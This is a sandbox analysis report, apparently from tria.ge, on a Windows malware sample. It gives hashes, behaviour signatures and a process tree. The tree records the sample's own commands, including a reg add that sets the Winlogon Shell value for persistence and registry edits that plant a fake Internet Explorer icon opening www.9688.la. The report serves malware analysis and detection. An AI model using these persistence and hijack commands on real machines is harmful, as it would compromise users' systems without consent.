Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

7c603ad1f3...6f.exe

windows7-x64

10

7c603ad1f3...6f.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/01/2024, 06:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7c603ad1f3386aefa20c302b18e8af6f.exe

  • Size

    60KB

  • MD5

    7c603ad1f3386aefa20c302b18e8af6f

  • SHA1

    3b515541d91f763a34ce548943011a6dddb7c91d

  • SHA256

    9b275b16dba4f8714d8618da965daec8af9c1e3be6ebc2d0285b079471cf2550

  • SHA512

    39bd36d92473057f45f212fe6a94906ba5391e0e6a820d8dd10099590783a04f3215e2928edc1bacb3dbd06e5f47f5f12adb23fc68441992925c717ea1e81290

  • SSDEEP

    768:/ZFSQpwJn0afaJgY9rl4ujLDtY/uVLq+BpfldFNR1IAY:/ZFqY9rl4ujLD+/uVq6lDIAY

Score
10/10
persistence

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Executes dropped EXE 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 14 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7c603ad1f3386aefa20c302b18e8af6f.exe
    "C:\Users\Admin\AppData\Local\Temp\7c603ad1f3386aefa20c302b18e8af6f.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:660
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\\nResurrection.bat
      2⤵
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:4612
      • C:\Windows\SysWOW64\PING.EXE
        ping -a 127.1
        3⤵
        • Runs ping.exe
        PID:1156
      • C:\Program Files\Microsoft IExplorer\S_Microsoft IExplorer\7c603ad1f3386aefa20c302b18e8af6f.exe
        "C:\Program Files\Microsoft IExplorer\S_Microsoft IExplorer\7c603ad1f3386aefa20c302b18e8af6f.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:4528
        • C:\Windows\SysWOW64\Reg.exe
          Reg Add "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t "REG_SZ" /d "explorer.exe,C:\Program Files\Microsoft IExplorer\D_Microsoft IExplorer\7c603ad1f3386aefa20c302b18e8af6f.exe" /f
          4⤵
          • Modifies WinLogon for persistence
          PID:2936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\\SetupShortcut.bat
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2960
          • C:\Windows\SysWOW64\PING.EXE
            ping -a 127.1
            5⤵
            • Runs ping.exe
            PID:4928
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v "{871C5380-42A0-1069-A2EA-08002B30309D}" /t REG_DWORD /d "00000001" /f
            5⤵
              PID:4384
            • C:\Windows\SysWOW64\reg.exe
              reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{A10AFF8B-F60D-4E71-89A0-522EAF8B676E}" /ve /d "Internet Explorer" /f
              5⤵
                PID:3408
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKEY_CLASSES_ROOT\CLSID\{A10AFF8B-F60D-4E71-89A0-522EAF8B676E}" /ve /d "Internet Explorer" /f
                5⤵
                • Modifies registry class
                PID:556
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKEY_CLASSES_ROOT\CLSID\{A10AFF8B-F60D-4E71-89A0-522EAF8B676E}\DefaultIcon" /ve /d "c:\program files\internet explorer\iexplore.exe" /f
                5⤵
                • Modifies registry class
                PID:3896
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKEY_CLASSES_ROOT\CLSID\{A10AFF8B-F60D-4E71-89A0-522EAF8B676E}\Shell\????(&H)" /ve /d "????(&H)" /f
                5⤵
                • Modifies registry class
                PID:1628
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKEY_CLASSES_ROOT\CLSID\{A10AFF8B-F60D-4E71-89A0-522EAF8B676E}\Shell\????(&H)\Command" /ve /d "c:\program files\internet explorer\iexplore.exe www.9688.la/?1" /f
                5⤵
                • Modifies registry class
                PID:4460
              • C:\Windows\SysWOW64\reg.exe
                reg add "HKEY_CLASSES_ROOT\CLSID\{A10AFF8B-F60D-4E71-89A0-522EAF8B676E}\ShellFolder" /v "Attributes" /t REG_DWORD /d 00000089 /f
                5⤵
                • Modifies registry class
                PID:2144
              • C:\Windows\SysWOW64\PING.EXE
                ping 127.1
                5⤵
                • Runs ping.exe
                PID:4524
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.1
            3⤵
            • Runs ping.exe
            PID:3344

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\Microsoft IExplorer\S_Microsoft IExplorer\7c603ad1f3386aefa20c302b18e8af6f.exe
        Filesize

        60KB

        MD5

        7c603ad1f3386aefa20c302b18e8af6f

        SHA1

        3b515541d91f763a34ce548943011a6dddb7c91d

        SHA256

        9b275b16dba4f8714d8618da965daec8af9c1e3be6ebc2d0285b079471cf2550

        SHA512

        39bd36d92473057f45f212fe6a94906ba5391e0e6a820d8dd10099590783a04f3215e2928edc1bacb3dbd06e5f47f5f12adb23fc68441992925c717ea1e81290

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\SetupShortcut.bat
        Filesize

        1KB

        MD5

        7a24a84b0c610b80359064bb45203725

        SHA1

        7b3a09217ee42330473ed1d2ab6fb6a0e2f72394

        SHA256

        3ce21d90aebfa1b56cb1fd89f6ef7f6f7e24ab89a5375e1fd0a42cb74d09975d

        SHA512

        557e574229c5de21ccd08f2fcece7a329798d699af7f95e636d87cc8e4089f38382c197d71289ff478607f4b84b7f712bb3f901b104681166793a63620af32b8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\nResurrection.bat
        Filesize

        391B

        MD5

        f83ef7dd8b66afa290509623e6647363

        SHA1

        b76da4cbe6243cd090cb4d67a896da2b031bd89e

        SHA256

        4763101db3d86033f6bf00f6e91cb6f52c9975d01bd2c7544b02f08c156595ff

        SHA512

        7bbd451064aea05ade7a73c25fcab231c33c4ebc33ef371686fb92484b0f14fb51c5025453291678857fe8b33474387eb8f8fafda4b14e49781e3ce78eeb63a5

        Download Submit